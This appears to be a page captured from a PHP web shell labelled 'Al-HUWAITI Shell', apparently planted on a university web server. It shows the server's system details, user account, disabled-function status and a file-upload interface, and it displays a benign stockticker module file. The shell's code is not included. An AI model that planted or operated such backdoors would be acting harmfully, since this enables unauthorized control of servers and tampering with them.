hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/video.obu.edu/panic/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/video.obu.edu/panic/modules/stockticker.module.php
<div class="stockticker" style="float:left; overflow: hidden; height: 1em;">
    <div class='stock'><?php echo rand(99,299); ?> Created by <a href='http://allynbauer.com'>Allyn Bauer</a></div>
    <div class='stock'>Get it at <a href='http://github.com/ajb/statuspanic'>GitHub</a></div>
    <div class='stock'>Today is <strong><?php echo date('l, M jS, Y'); ?></strong></div>
    <?php
    for ($i=1; $i<=20; $i++) {
        $gravatar = '<img src="http://www.gravatar.com/avatar.php?gravatar_id='. md5($i) .'&s=20&d=monsterid" align="top"> ';
        echo "<div class='stock'>". $gravatar ." this is a sample text message #". $i ." </div>";
    }
    ?>
</div>
<div style="clear: all;"></div>
<br/>


Al-HUWAITI Shell